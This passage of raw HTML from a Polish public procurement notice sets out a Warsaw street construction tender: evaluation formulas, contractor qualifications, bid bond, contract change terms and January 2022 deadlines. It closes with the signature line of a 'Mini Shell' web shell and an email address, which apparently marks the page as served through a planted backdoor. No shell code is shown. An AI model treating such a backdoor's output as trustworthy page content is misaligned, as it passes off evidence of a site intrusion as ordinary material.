Dodatkowy kod CPV: </h3> <p class="mb-0">45232130-2 - Roboty budowlane w zakresie rurociągów do odprowadzania wody burzowej</p> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <p class="mb-0">77310000-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">9 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Spośród ofert niepodlegających odrzuceniu, Zamawiający wybierze najkorzystniejszą ofertę kierując się kryteriami:<br/>	„Cena brutto” – waga 60 % to jest 60 pkt<br/>	„Termin realizacji zamówienia” – waga 20 % to jest 20 pkt<br/>	„Okres gwarancji jakości na roboty budowlane (z wyłączeniem prac zieleniarskich)” – waga 20 % to jest 20 pkt<br/>	W kryterium „Cena brutto” Zamawiający przyzna punkty zgodnie z poniższym wzorem:<br/><br/>C=(C_min- najniższa zaoferowana cena brutto )/( C_o- cena brutto zaoferowana przez Wykonawcę,dla którego wynik jest obliczany) x 60 pkt<br/><br/>C - liczba punktów przyznana ofercie ocenianej w kryterium „Cena brutto”<br/>60 pkt - maksymalna liczba punktów do uzyskania w kryterium „Cena brutto”<br/><br/>	W kryterium „Termin realizacji zamówienia” Zamawiający przyzna punkty zgodnie z poniższym wzorem:<br/>T=(T_min- najkrótszy termin wykonania zamówienia )/( To- termin wykonania zamówienia zaoferowany przez Wykonawcę,dla którego wynik jest obliczany) x 20 pkt<br/><br/>T - liczba punktów przyznana ofercie ocenianej w kryterium „Termin realizacji zamówienia”<br/>Tmin – 6 miesięcy<br/>20 pkt - maksymalna liczba punktów do uzyskania w kryterium „Termin realizacji zamówienia”<br/>	Pożądany termin wykonania przedmiotu zamówienia: 6 miesięcy (licząc od dnia zawarcia umowy).<br/>	W przypadku, gdy Wykonawca zadeklaruje termin wykonania przedmiotu zamówienia krótszy niż 6 miesięcy lub dłuższy niż 9 miesięcy, jego oferta zostanie odrzucona przez Zamawiającego.<br/>	W kryterium „Okres gwarancji jakości na roboty budowlane” Zamawiający przyzna punkty zgodnie z poniższym wzorem:<br/><br/>G=(G_o-okres gwarancji jakości na roboty budowlane zaoferowany przez Wykonawcę,dla którego wynik jest obliczany)/(G_max- najdłuższy okres gwarancji jakości) x 20 pkt<br/><br/>G - liczba punktów przyznana ofercie ocenianej w kryterium „Okres gwarancji jakości na roboty budowlane”<br/>Gmax – 6 lat<br/>20 pkt - maksymalna liczba punktów do uzyskania w kryterium „Okres gwarancji jakości na roboty budowlane”<br/>	Zamawiający wymaga udzielenia gwarancji jakości na roboty budowlane na okres co najmniej 3 lat. W przypadku, gdy Wykonawca zadeklaruje okres gwarancji jakości na roboty budowlane krótszy niż 3 lata, jego oferta zostanie odrzucona przez Zamawiającego.<br/>	W przypadku, gdy Wykonawca zadeklaruje okres gwarancji jakości na roboty budowlane 6 lat lub dłuższy, otrzyma maksymalną liczbę punktów w kryterium „Okres gwarancji jakości na roboty budowlane”.<br/>	Postanowienia szczegółowe w zakresie gwarancji jakości określają projektowane postanowienia umowy.<br/><br/>	Wszystkie obliczenia będą dokonywane z dokładnością do dwóch miejsc po przecinku.<br/>	Zamawiający nie przewiduje przeprowadzenia aukcji elektronicznej po dokonaniu oceny ofert.<br/>	Za najkorzystniejszą ofertę zostanie uznana ta, która uzyska łącznie najwyższą liczbę punktów na podstawie ww. kryteriów oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości na roboty budowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1)	nie podlegają wykluczeniu z postępowania na podstawie przesłanek wskazanych przez Zamawiającego w rozdziale XV SWZ;<br/>2)	spełniają warunki udziału w postępowaniu określone w ust. 2.<br/>2.	O udzielenie zamówienia może ubiegać się Wykonawca, który spełni warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej, tj.:<br/>1)	w odniesieniu do doświadczenia – wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, należycie wykonał, co najmniej 2 zamówienia – każde zamówienie:<br/>a)	polegające na remoncie, przebudowie lub budowie ulicy,<br/>b)	o wartości robót budowlanych (w zakresie wskazanym w lit. a) nie mniejszej niż 2 000 000 zł brutto.<br/>Pod pojęciem „zamówienie” należy rozumieć realizację jednej umowy z jednym zamawiającym;<br/>2)	w odniesieniu do osób skierowanych przez Wykonawcę do realizacji zamówienia – wykaże, że dysponuje, co najmniej 1 osobą, która będzie kierowała robotami budowlanymi (budową), posiadającą:<br/>a)	uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności drogowej albo inne uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania których w aktualnym stanie prawnym uprawniają uprawnienia budowlane wykonawcze, w tej specjalności;<br/>b)	co najmniej pięcioletnie doświadczenie zawodowe w zakresie sprawowania funkcji kierownika budowy.<br/>W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców wystarczy, że Wykonawcy spełnią warunek dotyczący zdolności technicznej lub zawodowej wspólnie - z zastrzeżeniem, że warunek odnoszący się do doświadczenia i kwalifikacji zawodowych spełni ten z Wykonawców, który wykona roboty budowlane, do realizacji których te zdolności są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	Wykonawca zobowiązany jest do złożenia wraz z ofertą Oświadczenia z art. 125 ust. 1 ustawy PZP.<br/>1)	Wykonawca, który powołuje się na zasoby podmiotów udostępniających zasoby, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania warunków udziału w postępowaniu w zakresie, w jakim powołuje się na ich zasoby, przedstawia Oświadczenie z art. 125 ust. 1 ustawy PZP podmiotu udostępniającego zasoby, w postaci elektronicznej opatrzone przez podmiot udostępniający zasoby kwalifikowanym podpisem elektronicznym, podpisem osobistym lub podpisem zaufanym.<br/>2)	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, Oświadczenie z art. 125 ust. 1 ustawy PZP składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia.<br/>3)	Oświadczenie z art. 125 ust. 1 ustawy PZP stanowi dowód potwierdzający brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu na dzień składania ofert, tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki dowodowe.<br/>2.	Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia podmiotowych środków dowodowych, jak niżej:<br/><br/>Na potwierdzenie braku podstaw wykluczenia z postępowania: <br/>Oświadczenie Wykonawcy o aktualności informacji zawartych w Oświadczeniu z art. 125 ust. 1 ustawy PZP w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Wykonawca zobowiązany jest do złożenia wraz z ofertą Oświadczenia z art. 125 ust. 1 ustawy PZP.<br/>1)	Wykonawca, który powołuje się na zasoby podmiotów udostępniających zasoby, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania warunków udziału w postępowaniu w zakresie, w jakim powołuje się na ich zasoby, przedstawia Oświadczenie z art. 125 ust. 1 ustawy PZP podmiotu udostępniającego zasoby, w postaci elektronicznej opatrzone przez podmiot udostępniający zasoby kwalifikowanym podpisem elektronicznym, podpisem osobistym lub podpisem zaufanym.<br/>2)	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, Oświadczenie z art. 125 ust. 1 ustawy PZP składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia.<br/>3)	Oświadczenie z art. 125 ust. 1 ustawy PZP stanowi dowód potwierdzający brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu na dzień składania ofert, tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki dowodowe.<br/>2.	Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia podmiotowych środków dowodowych, jak niżej:<br/><br/>Na potwierdzenie spełniania warunków udziału w postępowaniu w celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu, dotyczących zdolności technicznej lub zawodowej:<br/>a)	wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonanych wspólnie z innymi Wykonawcami, wykaz winien dotyczyć robót budowlanych faktycznie przez niego wykonanych;<br/>b)	wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień i doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest do wniesienia wadium w wysokości: 42 000 zł (słownie złotych: czterdzieści dwa tysiące).<br/>2.	Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572).<br/>3.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2-3 i ust. 2 ustawy PZP. <br/>4.	Skuteczne wniesienie wadium w pieniądzu następuje z chwilą wpływu środków pieniężnych na rachunek bankowy, o którym mowa w ust. 5, przed upływem terminu składania ofert. Zamawiający zaleca, aby Wykonawca złożył wraz z ofertą dowód wniesienia wadium w formie pieniężnej (kopię potwierdzenia przelewu). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia:<br/>1)	ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego;<br/>2)	ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy.<br/>3.	Jeżeli zostanie wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, z zastrzeżeniem ust. 2.<br/>2.	Zamawiający przewiduje zmiany zawartej umowy dotyczące:<br/>1)	terminu realizacji zamówienia w przypadku zaistnienia jednej z następujących okoliczności:<br/>a)	wystąpienia warunków pogodowych przez okres minimum 4 dni uniemożliwiających, ze <br/> względów technologicznych prowadzenie robót, pomimo dołożenia przez Wykonawcę <br/> wszelkich starań aby roboty mogły zostać zrealizowane, z zastrzeżeniem, iż okres <br/> wydłużenia terminu realizacji nie może być dłuższy niż okres trwania wyżej <br/> wymienionych warunków pogodowych powodujących brak możliwości prowadzenia <br/> robót,<br/>b)	wstrzymania robót lub przerw w pracach powstałych z przyczyn leżących <br/> po stronie Zamawiającego, <br/>c)	działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron,<br/>d)	zmiany dokumentacji projektowej lub/i specyfikacji technicznych, o których mowa § 1 ust. 2 na wniosek Zamawiającego,<br/>e)	działań zmierzających do ograniczenia skutków zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć,<br/>f)	w razie zaistnienia zdarzeń niezależnych od Stron, po dacie zawarcia umowy, których strony nie były w stanie przewidzieć w momencie jej zawierania i których zaistnienie lub skutki uniemożliwiają wykonanie Przedmiotu umowy w sposób należyty,<br/>g)	wystąpienia robót dodatkowych nieobjętych zamówieniem podstawowym lub robót zamiennych, <br/>h)	braku możliwości uzyskania wymaganych uzgodnień, decyzji w terminie umownym z przyczyn niezależnych od Wykonawcy, przy zachowaniu przez Wykonawcę należytej staranności,<br/>i) w przypadku zawarcia umowy z Wykonawcą po upływie pierwotnego terminu związania ofertą w wyniku przedłużającej się procedury przetargowej o czas jaki minął od upływu pierwotnego terminu związania ofertą do dnia zawarcia umowy;<br/>2) osoby pełniącej funkcje kierownika budowy w przypadku zaistnienia <br/> jednej z następujących okoliczności:<br/>a) nie wykonywania lub nienależytego wykonywania swoich obowiązków wynikających z <br/> umowy,<br/>b) śmierci, choroby trwającej dłużej niż 5 dni lub innych zdarzeń losowych;<br/> 3) zgłoszenia udziału podwykonawcy lub dalszego podwykonawcy,<br/>4) zmiany podwykonawców w przypadku zaistnienia jednej z następujących okoliczności:<br/>a) zmiana podwykonawcy - musi być zaakceptowana przez Zamawiającego,<br/> b) zmiana zakresu powierzonych prac,<br/>5) rezygnacji z udziału z podwykonawcy lub dalszego podwykonawcy. <br/>3.	Przesunięcie terminu wykonania Przedmiotu umowy nastąpi o tyle dni, przez ile trwały przyczyny, o których mowa w ust. 2 pkt 1, przy czym wymagają one potwierdzenia przez przedstawiciela Zamawiającego.<br/>4.	Wykonawca składa Zamawiającemu pismo z prośbą o przesunięcie terminu wykonania Przedmiotu umowy wraz z uzasadnieniem nie później niż 14 dni przed upływem terminu określonego w § 2 ust. 3.<br/>5.	Wykonawca może dokonać zmiany osoby pełniącej funkcje kierownika budowy, o której mowa w ust. 2 pkt 2 jedynie za uprzednią pisemną zgodą Zamawiającego. <br/>6.	Wykonawca obowiązany jest zmienić kierownika budowy zgodnie z żądaniem Zamawiającego w terminie wskazanym przez Zamawiającego. Osoby zastępujące muszą posiadać minimum takie same kwalifikacje i uprawnienia.<br/>7.	Wprowadzenie zmian do zawartej umowy określonych w ust. 2 wymaga sporządzenia przez Zamawiającego uzasadnienia określającego przyczyny zmiany. Uzasadnienie będzie załącznikiem do aneksu zmieniającego niniejszą umowę. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-01-03 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Systemu Zakupowego Miasta Stołecznego Warszawy dostępnego pod adresem: https://zamowienia.um.warszawa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-01-03 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-02-01</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com